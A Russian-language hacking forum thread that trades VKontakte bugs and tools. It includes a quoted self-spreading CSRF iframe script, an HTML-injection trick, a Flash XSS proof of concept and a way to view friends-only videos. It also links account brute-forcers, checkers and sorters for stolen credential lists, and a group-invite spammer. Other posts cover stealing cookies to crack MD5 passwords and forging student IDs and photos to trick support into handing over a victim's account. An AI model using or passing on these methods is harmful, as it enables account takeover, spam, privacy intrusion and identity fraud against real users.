Баги, фишки и софт для вконтакте

[ddd]

Пишем кто что знает, и что интересного нашел.
Так как я там недавно, наверное большенство будет боян :) вот интереснЫй найденЫй глюк. В поиске друзей нет фильтра, можно вставлять любой html-код :)

Ну вот еще прикольная сЫлочка:

http://vkontakte.ru/profileEdit.php?subm=10&sex=3&status=4&status=4&with=1498579&bday_day=58&bday_month=12&bday_year=3801&bday_visibility=1&home_town=%CF%E5%F1%E4%E0%F5%F3%E5%E2%EE&political=6&religion_name=%D1%E2%E8%E4%E5%F2%E5%EB%FC%20%F1%E2%E8%E4%E5%F2%E5%EB%E5%E9%20%E8%E5%E3%EE%E2%E0&religion_id=0

Можете чуток изменить и дать другу или подруге :)

ЗЫ: попожа вЫложу скрипт заливки изображений вместо графити.

 

[ddd]

Хех я тут мудохался, чтоб скрипт заливки изображений вместо граффити еще удобней сделать, и тут случайно наткнулся на прогу это реализующую :)

Скачать: (локал) (мир)
Скачать исходники: (локал) (мир)


И в догонку Инвайтер вконтакте. Скрипт позволяет бЫстро рекламить группу, рассЫлая приглашения в ПМ. Желательно делать это не от своего аккаунта, могут забанить :)
В скрипте предварительно надо указать ид группЫ и диапазон пользователей :)

Скачать: (локал) (мир)


Пасс от локала: webcriminal

 

[ddd]

Взято с хабрахабра:

CSRF на vkontakte.ru
Обнаружил забавную атаку на сайт vkontakte.ru. При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
  var html;
  html = &apos;<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>&apos;;
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле "Веб-сайт" станет равным tvoydohod.com. Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл

себе... И т д.
Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.
Отписал в тех-поддержку, где столкнулся с "Это не баг!", "Не кликайте по подозрительным ссылкам!" и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом "вирусе", который живет целиком в соц-сети =)

 

[ddd]

Брутофорсер для вконтакте.
Скачать

 

[M03r]

[:|||||:]

давно уже ничего не работает.

 

[ddd]

M03r, что именно? Брут, залифка картинок вместо графити и т.п. пашет. Из вЫше перечисленного непашет токо фенька с поиском. Теперь есть фильтрация.


ЗЫ: http://vkontakte.ajachtung.com хороший ресурс по изменению внешнего вида контакта, с помощью JABFrame-скриптов.

 

[ddd]

Скрипт для поиска и сохранения фотографий, а также для парсинга логов.

$id="";[COLOR=Green]//Твой ID[/COLOR]
$email="";[COLOR=Green]//Твое мЫло[/COLOR]
$password=md5("");[COLOR=Green]//Твой пасс [/COLOR]
$sex="1";[COLOR=Green]//Пол, 1 - женский, 2 - мужской[/COLOR]
$city="1";[COLOR=Green]//ID - города[/COLOR]

Несколько примеров ID для городов:

1 - Москва
2 - Санкт-Петербург
10 - Волгоград
35 - Великий Новгород
49 - Екатеринбург
60 - Казань
61 - Калининград
72 - Краснодар
73 - Красноярск
87 - Мурманск
95 - Нижний Новгород
99 - Новосибирск
104 - Омск
110 - Пермь
112 - Петрозаводск
119 - Ростов-на-Дону
123 - Самара
125 - Саратов
151 - Уфа
158 - Челябинск

Скачать

 

[ddd]

Вконтакте не любит оперу?)
Такой вот комментарий:

            if(navigator.userAgent.indexOf("Opera") != -1) [B][I]// выкинь свой браузер к черту[/I][/B]
                break;

Содержится в скрипте по адресу: http://vkontakte.ru/js/select.js :)

Ну и еще xss-уязвимость. Она заключается в том, что в исходнЫй код флэшки можно внедрить javascript, которЫй при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем. ОсновЫваясь на этом, сделали proof-of-concept. Когда флэшка сохранилась в кэше браузера, то она может открЫть новое окно с ссЫлкой на себя, браузер ее загрузит из кэша - и javascript вЫполнится. Единственное, что спасает, - это блокировщик всплЫвающих окон. Но обЫчнЫе пользователи, видя, что открЫвает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6, Opera 9.27 и FF3RC2.

Пример атаки:
http://vkontakte.ru/apps.php?act=s&id=151392

 

[M03r]

xss мы нашли :) об этом можно почитать в жж. там же примеры и описание.

 

[ddd]

Просмотр скрЫтЫх видео:

Например кто-нибудь поставил просмотр только для друзей и мЫ видим перед собой картинку этого видео.

Копируем её сЫлку
Для примера такую:

http://194.186.176.7/assets/thumbnails/8fb90af010158964.160.vk.jpg

возьмем оттуда только 8fb90af010158964
разделим на 2 части (по ровну)
получим 8fb90af0и 10158964

vtag=8fb90af0 и vkid=10158964

теперь получим локейшн нашего видео.

http://vkadre.ru/get_video?version=1&vtag=8fb90af0&vkid=10158964

пройдя по линку мы увидем:

<location>
http://7.vkadre.ru/assets/videos/8fb90af010158964.vk.flv
</location>

что собственно нас и интересует.

© Don1-2 tgbr.in

 

[ddd]

Делаемся невидимЫм в вконтакте (только для firefox)

1. ОткрЫваем Firefox
2. В адресной строке вводим about:config
3. В поле filter вводим network.http.redirection-limit
4. Внизу появится только этот параметр, меняем его значение на 0 (тем самЫм запрещаем обрабатЫвать переадресации)
5. ОткрЫваем новую вкладку (Ctrl+T), грузим страницу входа http://vkontakte.ru/login.php и логинимся
6. ВЫлезет ошибка, но так и должно бЫть.
7. Идем на какую-нить другую страницу, например, http://vkontakte.ru/friend.php
8. Возвращаемся во вкладку с настройками и меняем значение параметра на дефолтное (у меня это 20)

Теперь вЫ в контакте, но в инвизе, обходим ссЫлки с profile.php и вЫ будете для ваших друзей в оффлайне.

--------------------

Узнаем кто оставил мнение

ОтсЫлаем ссЫлку в ответ на мнение:
http://vkontakte.ru/matches.php?act=a_sent&to_id=[Твой ID]&dec=1
Без [ ]

Человек переходя по ссЫлке автоматом отвечает на твое предложение :)

--------------------

Отменяем заявку в друзья

просто берем эту ссЫлку:
friend.php?act=remove&id=
после = пишим id и нажимаем "Удалить" заявка отменяется (если вписать id друга то он удлиться)

 

[ddd]

VKTools (alpha)

GUI-приложение, позволяющее брутить и чекать аккаунтЫ Vkontakte.ru.

Checker
Проверяет валидность акка и записЫвает валид в good.txt по дефолту.

Accounts file->Загружаем файл вида:
email@host:password

Bruter
ПЫтается подобрать пароль для заранее обозначеннЫх email-ов.
Брутит парЫ mail:pass
Из валиднЫх аккаунтов извлекает рейтинг пользователя
ВЫходной файл будет в формате:
user@host:pass:rating

Misc
Поддержку прокси пока нету.

Hint
ЧтобЫ пробрутить диапазон мЫльников по одному паролю - поместите в файл паролей ваш пароль, и все емейлЫ будут брутиться по нему.

To-Do-List
В планах добавить спамилку групп с парсингом друзей владельца акка и рассЫлки им приглашений (т.к. многие сейчас стали запрещать посторонним приглашать их в группЫ).

Скачать: [deposit] [local]

-------------------------

Vkontakte bruteforce

ОбновленЫй билд брутера на C#

Скачать: [deposit] [local]

 

[ddd]

[Public]Сортировщик аккуантов vkontakte.ru по количеству друзей

[/B][/COLOR][/SIZE]
[IMG]http://album.karelia.ru/users/5975/544.jpeg[/IMG]

Вводим название файла с акками (разделитель ";"), далее два параметра: минимальное и максимальное количество друзей у аккуанта, и еще два: название файлов для аккуантов соответствующие условиям и нет.

АккуантЫ должнЫ бЫть 100% валиднЫе, при 1ом же не валидном аккуанте работа завершается.

Также скрипт подсчитывает общее количество друзей.

[B]Скачать:[/B] ([URL="http://avirairk.ru/new/sort_public.rar"][COLOR=Red]мир[/COLOR][/URL]) ([URL="http://disk.karelia.ru/s/SrDEN/soft/%5D%5B/sort_public.rar"][COLOR=Blue]локал[/COLOR][/URL]) (паcc - zloy)

 

[ddd]

Vkontakte Optimizer (VKOpt) - это скрипт (адд-он), позволяющий дополнять интерфейс популярного сайта http://vkontakte.ru/ полезнЫми и удобнЫми функциями.

Список функций:

1. Скачивание видео ( + код плеера для блога)
2. Скачивание аудио
3. Пригласить всех друзей в группу
4. Пригласить всех друзей на встречу
5. Автоматическая развертка вставленнЫх картинок
6. Уведомление о вЫходе новой версии скрипта
7. Разбивка списка групп в столбик
8. Скачивание видео с vkadre.ru
9. Настройка всех функций

Установка:

~Mozilla Firefox~

• Установи расширение Greasemonkey
• Bнизу появится значок
  
• Просто кликни сюда: vkopt.user.js, чтобЫ установить скрипт.
• Иконкой,
  
  скрипт в любой момент можно включать и вЫключать.

~Opera~
В верхнем меню вЫбери
«Tools» →
«Preferences» →
«Advanced» →
«Content» →
«JavaScript options» →
поле «User JavaScript files»

(русский:
«Инструмент» →
«Настройки» →
«Дополнительно» →
«Содержание» →
«ПараметрЫ JavaScript» →
поле «Мои файлЫ JavaScript»)

И вЫбирай папку, в которую вЫ сохранили скрипт.

Обновление версии:

Обновление для Mozilla Firefox:

vkopt.user.js (версия 1.3 beta)
(просто щелкните по этой ссЫлке, потом нажмите правой кнопкой по мартЫшке внизу и отключите старую версию, если она осталась включенной)

Обновление для Opera:

vkopt.js (версия 1.3 beta)
(щелкнув правой кнопкой, сохраните файл туда же, куда сохраняли при первой установке, и разрешите перезаписать)


Bерсии скрипта:

Версии для Mozilla Firefox:

vkopt.user.js (версия 1.1)
vkopt.user.js (версия 1.3 beta)

Версии для Opera:

vkopt.js (версия 1.3 alpha - с функцией слайдшоу альбомов)
vkopt.js (версия 1.3 beta)



Ну и еще забавная ошибка:

http://vkontakte.ru/blank.php?code=1800&mp3=%C2%EA%EE%ED%F2%E0%EA%F2%E5.%F0%F3%20%EE%F2%E2%E5%E1%EA%F0%E8%EC%E8%ED%E0%EB%E5%ED%20:)

 

[spectre]

Возможен взлом через cookie,угоняем чужие cookie
remixpass- pass в md-5
remixmail - mail
remixid -id
все просто либо через online либо через passwordPro выдираем pass а дальше все просто конечно как угнать cookie дело каждого но кому просто хочется просто побаловаться можно использовать p2p.

 

[TRaY]

Есч0 один способ угнать анкету:
Фконтакте есть тех.поддержка, у техподдержки есть возможность восстанавливать\сбрасывать пароли\мыла от анкеты. Для этого нужно сделать следующее, каг пишет сапорт:
Смена е-мейла возможно при подтверждении Вашей личности. Для подтверждении личности необходимо выслать:
1. Отсканированную(сфотографированную) страничку любого документа (студенческий, школьный билет,БСК, пропуск на работу, зачетная книжка и т.д.) 2. Фотографию, где Вы на фоне моего последнего сообщения(т.е. рядом с монитором так,чтобы было видно мое сообщение).3 Ссылку на Вашу страницу. 4. Е-мейл на который хотите сменить.Все это необходимо отправить на адрес технической поддржки(manukyan@vkontakte.ru одно из мыл), ответ будет отправлен Вам на Ваш ящик ...

Теперь план действий:
1.Документ - не проблема, смотрим где учится наша "жертва", сканируем стандартный ученический\студенчиский - берем в руки фотожоп - меняем на нужные нам данные. Тем более, если не умеем рисовать - рисуем каг можем - ухудшаем качество, тк фоткать разрешено, и по поводу качества снимка никто вопросов задавать не будет.
2.Тож самое, фотошоп в зубы и вперед, фотку можно взять со страници "жертвы" и над ней хорошенько поработать, но не факт что фото открыты и т.п. таг что тут зависит от ситуации.
3.Тут все понятно.
4.тут думаю тоже вопросов нету.

Способу до идеала далековато, но фсе же хоть что-то)
Кто будет пробовать - отпишите потом о результате, т.к. сейчас нету возможности этим заниматься.